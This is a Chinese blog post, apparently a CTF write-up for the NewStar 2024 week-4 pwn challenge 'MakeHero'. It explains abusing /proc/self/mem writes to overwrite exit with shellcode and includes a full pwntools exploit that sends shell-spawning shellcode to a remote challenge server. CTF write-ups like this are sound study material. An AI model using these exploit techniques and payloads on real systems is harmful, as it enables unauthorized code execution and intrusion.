<p>&#x2F;proc&#x2F;self&#x2F;mem是当前进程的内存内容，通过修改该文件相当于直接修改当前进程的内存数据。但是注意该文件不能直接读取，因为文件中存在着一些无法读取的未被映射区域。所以要结合&#x2F;proc&#x2F;self&#x2F;maps中的偏移地址进行读取。通过参数start和end及偏移地址值读取内容。</p>
<p>所以就是write朝文件指定位置（lseek所在）写入buf中一字节的内容，有且只有两次机会</p>
<p>FULL RELOR，got表不可改……吗？</p>
<p><img src="/../css/img/w4/1729762454472.png"></p>
<p>两段可改内存分别位于（init输出的）</p>
<p><img src="/../css/img/w4/1729762802816.png"></p>
<p><img src="/../css/img/w4/1729762916971.png"></p>
<p>整个libc在里面，可执行段在里面 &#x3D;&gt; libc改可执行</p>
<p>根据调试地址猜测，这两段能修改的地址一段是ida反编译程序的基地址，一段是调用函数的真实地址的基地址</p>
<p>如果可以把可执行段中函数改成system，参数改成&#x2F;bin&#x2F;sh，第二次执行这个函数的时候就能调用system</p>
<p>一字节该怎么改？如果不是一字节的话，那就可以考虑直接写入shellcode</p>
<p>那就把write的参数由1改成0xff，然后把open_mem的返回地址覆盖成shellcode</p>
<p>不行，程序要求第一次改ida中内容，第二次改另外一段内容</p>
<p>而且改write的参数也纹丝不动……好像动了，只是位置写错了</p>
<p><img src="/../css/img/w4/1729943207530.png"></p>
<p><img src="/../css/img/w4/1729943169373.png"></p>
<p>成功的</p>
<p><img src="/../css/img/w4/1729943442368.png"></p>
<p>那就把exit改成shellcode?</p>
<p><img src="/../css/img/w4/1729943737049.png"></p>
<p>exit开始于</p>
<p><img src="/../css/img/w4/1729943770487.png"></p>
<p>如果write的buf地址是<code>0x7ffe9640da30</code>（写入shellcode的地址）就好了，但其实0xff字节可以到，开始读取的地址与shellcode地址只差0x3c，那么被覆盖地址往前0x3c，shellcode就正好盖到exit</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># exp</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line"><span class="comment"># p = process(&#x27;./makehero/MakeHero&#x27;)</span></span><br><span class="line">p = remote(<span class="string">&#x27;8.147.132.32&#x27;</span>, <span class="number">39543</span>)</span><br><span class="line">context.arch = <span class="string">&#x27;amd64&#x27;</span></span><br><span class="line"></span><br><span class="line">exit_addr = <span class="number">0x1d5f0</span></span><br><span class="line">shellcode = asm(shellcraft.sh())</span><br><span class="line"><span class="comment">#print(len(shellcode))</span></span><br><span class="line">write_args = <span class="number">0x1400</span></span><br><span class="line"></span><br><span class="line">p.recvuntil(<span class="string">b&#x27;** 0x&#x27;</span>)</span><br><span class="line">value1 = <span class="built_in">int</span>(p.recv(<span class="number">12</span>),<span class="number">16</span>)</span><br><span class="line"><span class="comment">#print(hex(value1))</span></span><br><span class="line"></span><br><span class="line">p.recvuntil(<span class="string">b&#x27; - 0x&#x27;</span>)</span><br><span class="line">v2 = p.recv(<span class="number">12</span>)</span><br><span class="line"><span class="comment">#print(v2)</span></span><br><span class="line">p.recvuntil(<span class="string">b&#x27;## 0x&#x27;</span>)</span><br><span class="line">v3 = <span class="built_in">int</span>(p.recv(<span class="number">12</span>),<span class="number">16</span>)</span><br><span class="line"><span class="comment"># print(hex(v3))</span></span><br><span class="line">p.recvuntil(<span class="string">b&#x27; - 0x&#x27;</span>)</span><br><span class="line">v4 = p.recv(<span class="number">12</span>)</span><br><span class="line"><span class="comment">#print(v4)</span></span><br><span class="line"></span><br><span class="line">value2 = value1 + write_args</span><br><span class="line">value2 = value2.to_bytes(<span class="number">6</span>, <span class="string">&#x27;big&#x27;</span>).<span class="built_in">hex</span>().encode()</span><br><span class="line"><span class="comment"># print(value2)</span></span><br><span class="line">value3 = v3 + exit_addr - <span class="number">0x3c</span></span><br><span class="line">value3 = value3.to_bytes(<span class="number">6</span>, <span class="string">&#x27;big&#x27;</span>).<span class="built_in">hex</span>().encode()</span><br><span class="line"><span class="comment"># print(value3)</span></span><br><span class="line"></span><br><span class="line">p.recvuntil(<span class="string">b&#x27;:&#x27;</span>)</span><br><span class="line">pause()</span><br><span class="line">p.sendline(shellcode)</span><br><span class="line"></span><br><span class="line">pl1 = <span class="string">b&#x27;0x&#x27;</span> + value2 + <span class="string">b&#x27; a0&#x27;</span></span><br><span class="line">p.sendline(pl1) <span class="comment"># &gt;=v3 &lt;v2 impossible</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># pause()</span></span><br><span class="line">pl2 = <span class="string">b&#x27;0x&#x27;</span> + value3 + <span class="string">b&#x27; 1&#x27;</span> </span><br><span class="line">p.sendline(pl2) <span class="comment"># &gt;=v3 &lt;v2 impossible</span></span><br><span class="line"></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>

<p><img src="/../css/img/w4/1729948802797.png"></p>

      
    </div>
    <footer class="article-footer">
      <a data-url="http://example.com/2024/11/13/w4/" data-id="cm3oe7zmv0003nkuzgfg5c2mv" data-title="2024 NewStar w4" class="article-share-link"><span class="fa fa-share">Share</span></a>
      
      
      
  <ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/CTF-PWN/" rel="tag">CTF PWN</a></li></ul>

    </footer>
  </div>
  
    
<nav id="article-nav">
  
    <a href="/2024/11/14/w5/" id="article-nav-newer" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Newer</strong>
      <div class="article-nav-title">
        
          2024 NewStar w5
        
      </div>
    </a>
  
  
    <a href="/2024/11/12/w3/" id="article-nav-older" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Older</strong>
      <div class="article-nav-title">2024 NewStar w3</div>
    </a>
  
</nav>

  
</article>


</section>
        
          <aside id="sidebar">
  
    

  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Tags</h3>
    <div class="widget">
      <ul class="tag-list" itemprop="keywords"><li class="tag-list-item"><a class="tag-list-link" href="/tags/CTF-PWN/" rel="tag">CTF PWN</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/Linux-Kernel-version-4-4-0/" rel="tag">Linux Kernel -version 4.4.0</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Tag Cloud</h3>
    <div class="widget tagcloud">
      <a href="/tags/CTF-PWN/" style="font-size: 20px;">CTF PWN</a> <a href="/tags/Linux-Kernel-version-4-4-0/" style="font-size: 10px;">Linux Kernel -version 4.4.0</a>
    </div>
  </div>

  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Archives</h3>
    <div class="widget">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2024/11/">November 2024</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Recent Posts</h3>
    <div class="widget">
      <ul>
        
          <li>
            <a href="/2024/11/23/Linux-Kernel_lab1/">【未解决】通过删除隐藏内核模块条目、kobject之后卸载模块</a>
          </li>
        
          <li>
            <a href="/2024/11/23/Linux-Kernel/">【未解决】通过删除隐藏内核模块条目、kobject之后卸载模块</a>
          </li>
        
          <li>
            <a href="/2024/11/14/w5/">2024 NewStar w5</a>
          </li>
        
          <li>
            <a href="/2024/11/13/w4/">2024 NewStar w4</a>
          </li>
        
          <li>
            <a href="/2024/11/12/w3/">2024 NewStar w3</a>
          </li>
        
      </ul>
    </div>
  </div>

  
</aside>
        
      </div>
      <footer id="footer">
  
  <div class="outer">
    <div id="footer-info" class="inner">
      
      &copy; 2024 John Doe<br>
      Powered by <a href="https://hexo.io/" target="_blank">Hexo</a>
    </div>
  </div>
</footer>

    </div>
    <nav id="mobile-nav">
  
    <a href="/" class="mobile-nav-link">Home</a>
  
    <a href="/archives" class="mobile-nav-link">Archives</a>
  
</nav>
    


<script src="/js/jquery-3.6.4.min.js"></script>



  
<script src="/fancybox/jquery.fancybox.min.js"></script>




<script src="/js/script.js"></script>





  </div>
</body>
</html>